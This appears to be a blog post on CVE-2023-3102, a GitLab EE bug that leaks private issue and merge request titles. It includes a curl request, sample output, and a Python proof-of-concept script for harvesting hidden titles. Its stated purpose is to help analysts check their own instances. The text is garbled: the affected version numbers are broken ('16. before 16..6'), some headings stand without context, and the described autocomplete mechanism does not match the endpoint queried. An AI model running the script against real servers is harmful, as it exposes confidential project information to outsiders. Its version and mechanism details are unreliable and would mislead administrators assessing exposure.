GitLab is one of the world’s most popular platforms for software development and DevOps, used by thousands of companies for collaboration and code management. However, in 2023, a severe vulnerability—CVE-2023-3102—was discovered in GitLab Enterprise Edition (EE), leading to the leak of sensitive information from private project spaces. In this post, we'll break down the problem, walk through how it can be exploited, show you some code snippets, and link out to further information.
What is CVE-2023-3102?
CVE-2023-3102 is a data exposure issue that impacts all GitLab EE versions from 16. before 16..6, and all 16.1 versions before 16.1.1. The vulnerability allows unauthorized users (even those who shouldn't be able to see private content) to access the *titles* of private issues and Merge Requests (MRs).
This means sensitive project information, private bug details, feature work, and security patches still in development could potentially be revealed just by exposing the *titles*—which sometimes are enough to give away business secrets.
Versions 16.1. up to (but not including) 16.1.1
If you’re running GitLab Community Edition (CE), you're not affected by this CVE.
How Does the Leak Happen?
The problem lies in how the GitLab EE interface handled certain API endpoints or UI widgets, specifically the *issues autocomplete* function. This function, intended to help users quickly find issues or MRs by typing in keywords, failed to properly filter out private items.
Attackers could craft requests (or use the regular UI, in some cases) to retrieve titles from private issues/MRs in projects they shouldn’t have access to.
Example Exploit Scenario
Suppose you’re a regular user or even just a visitor (depending on the project settings). If you use the autocomplete function on a public issue or MR and start typing, GitLab EE, in these vulnerable versions, might show you *all* matching issue/MR titles—even from private projects you shouldn’t know exist.
Example API Request
Here’s an example using curl to hit the autocomplete endpoint (assuming the path and endpoints are similar in your GitLab instance):
curl -s 'https://gitlab.example.com/api/v4/projects/PROJECT_ID/issues?search=SECRET';
If the server is vulnerable, you might see responses like
[
{
"id": 12345,
"title": "SECRET vulnerable backend component",
"state": "opened"
},
{
"id": 12346,
"title": "SECRET roadmap milestone",
"state": "opened"
}
]
Even though you’re not a member, the *title* is revealed.
Below is a simple script to automate the search for hidden private issue titles
import requests
base_url = "https://gitlab.example.com";
project_id = 123 # Replace with public project
search_term = "secret" # Try with various terms
api_url = f"{base_url}/api/v4/projects/{project_id}/issues?search={search_term}"
r = requests.get(api_url)
if r.status_code == 200:
issues = r.json()
for i in issues:
print(f"ID: {i['id']} Title: {i['title']}")
else:
print("Request failed.")
This PoC can help security analysts confirm whether their instance is vulnerable.
Security tickets or embargoed topics
Even if only the *title* is revealed, attackers can use this reconnaissance for social engineering, phishing, or to find other weaknesses.
Upgrade 16.1.x to at least 16.1.1
You can download the patched versions here:
GitLab Download Links
References
- GitLab Security Release Blog (July 2023)
- CVE-2023-3102 on MITRE
- GitLab Advisory for CVE-2023-3102
- GitLab Issue Tracker
- Detailed NVD Entry
Conclusion
CVE-2023-3102 is a strong reminder that even minor UI features like autocomplete must be handled with care in complex software like GitLab. Titles can leak more than you think, and fixing such issues swiftly is critical to keeping your source code and business operations safe.
If you run GitLab EE, update immediately and always keep your eye out for new security releases.
*Stay tuned for more vulnerability breakdowns and how-tos. If you found this useful, share it with your security team and DevOps engineers!*
Timeline
Published on: 07/21/2023 16:15:00 UTC
Last modified on: 07/31/2023 17:04:00 UTC